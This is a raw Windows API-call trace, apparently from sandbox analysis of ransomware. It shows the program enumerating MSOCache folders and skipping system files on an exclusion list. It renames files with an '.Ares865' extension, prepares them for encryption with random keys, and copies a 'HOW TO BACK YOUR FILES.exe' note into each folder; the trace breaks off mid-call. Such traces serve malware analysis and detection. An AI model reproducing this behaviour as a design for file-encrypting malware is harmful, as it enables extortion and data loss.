ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x60449620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x60449620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.452] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.452] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.452] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.452] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x60449620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x60449620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.452] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.452] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.452] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.452] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.452] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60449620, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x60449620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0078.452] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0078.452] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0078.452] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.452] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="aoldtz.exe") returned 1 [0078.452] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2=".") returned 1 [0078.452] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="..") returned 1 [0078.452] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="windows") returned -1 [0078.452] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="bootmgr") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="temp") returned -1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="pagefile.sys") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="boot") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="ids.txt") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="ntuser.dat") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="perflogs") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="MSBuild") returned 1 [0078.453] lstrlenW (lpString="PowerPointMUI.msi") returned 17 [0078.453] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*") returned 64 [0078.453] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="aoldtz.exe") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2=".") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="..") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="windows") returned -1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="bootmgr") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="temp") returned -1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="pagefile.sys") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="boot") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="ids.txt") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="ntuser.dat") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="perflogs") returned 1 [0078.453] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="MSBuild") returned 1 [0078.453] lstrlenW (lpString="PowerPointMUI.xml") returned 17 [0078.453] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0078.453] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.Ares865") returned 88 [0078.453] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.ares865"), dwFlags=0x1) returned 1 [0078.454] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.454] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1450) returned 1 [0078.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0078.455] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0078.455] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.455] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0078.456] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b0, lpName=0x0) returned 0xa4 [0078.457] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b0) returned 0x190000 [0078.458] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0078.458] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.458] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0078.458] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.458] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.458] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0078.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0078.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.459] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.459] CloseHandle (hObject=0xa4) returned 1 [0078.459] CloseHandle (hObject=0x118) returned 1 [0078.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0078.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.459] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0078.459] lstrcmpiW (lpString1="PptLR.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.459] lstrcmpiW (lpString1="PptLR.cab", lpString2="aoldtz.exe") returned 1 [0078.459] lstrcmpiW (lpString1="PptLR.cab", lpString2=".") returned 1 [0078.459] lstrcmpiW (lpString1="PptLR.cab", lpString2="..") returned 1 [0078.459] lstrcmpiW (lpString1="PptLR.cab", lpString2="windows") returned -1 [0078.459] lstrcmpiW (lpString1="PptLR.cab", lpString2="bootmgr") returned 1 [0078.460] lstrcmpiW (lpString1="PptLR.cab", lpString2="temp") returned -1 [0078.460] lstrcmpiW (lpString1="PptLR.cab", lpString2="pagefile.sys") returned 1 [0078.460] lstrcmpiW (lpString1="PptLR.cab", lpString2="boot") returned 1 [0078.460] lstrcmpiW (lpString1="PptLR.cab", lpString2="ids.txt") returned 1 [0078.460] lstrcmpiW (lpString1="PptLR.cab", lpString2="ntuser.dat") returned 1 [0078.460] lstrcmpiW (lpString1="PptLR.cab", lpString2="perflogs") returned 1 [0078.460] lstrcmpiW (lpString1="PptLR.cab", lpString2="MSBuild") returned 1 [0078.460] lstrlenW (lpString="PptLR.cab") returned 9 [0078.460] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0078.460] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="aoldtz.exe") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="bootmgr") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="temp") returned -1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="pagefile.sys") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="boot") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="ids.txt") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="perflogs") returned 1 [0078.460] lstrcmpiW (lpString1="Setup.xml", lpString2="MSBuild") returned 1 [0078.460] lstrlenW (lpString="Setup.xml") returned 9 [0078.460] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0078.460] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.460] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.461] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.461] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1886) returned 1 [0078.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0078.462] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0078.462] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.462] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0078.463] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa60, lpName=0x0) returned 0xa4 [0078.464] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa60) returned 0x190000 [0078.464] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0078.465] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.465] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0078.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.465] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.465] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.466] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.466] CloseHandle (hObject=0xa4) returned 1 [0078.466] CloseHandle (hObject=0x118) returned 1 [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.466] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0078.466] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0078.466] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2248 [0078.466] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C" [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0078.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0078.466] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned 62 [0078.466] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C" [0078.466] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.466] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.471] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.471] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6046f780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6046f780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.471] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.471] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.471] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.471] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6046f780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6046f780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.471] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.471] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.471] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.471] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.471] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="aoldtz.exe") returned 1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2=".") returned 1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="..") returned 1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="windows") returned -1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="bootmgr") returned 1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="temp") returned -1 [0078.471] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="pagefile.sys") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="boot") returned 1 [0078.472] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="ids.txt") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="ntuser.dat") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="perflogs") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="MSBuild") returned -1 [0078.472] lstrlenW (lpString="ExcelLR.cab") returned 11 [0078.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*") returned 64 [0078.472] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="aoldtz.exe") returned 1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2=".") returned 1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="..") returned 1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="windows") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="bootmgr") returned 1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="temp") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="pagefile.sys") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="boot") returned 1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="ids.txt") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="ntuser.dat") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="perflogs") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="MSBuild") returned -1 [0078.472] lstrlenW (lpString="ExcelMUI.msi") returned 12 [0078.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0078.472] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.472] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="aoldtz.exe") returned 1 [0078.472] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: 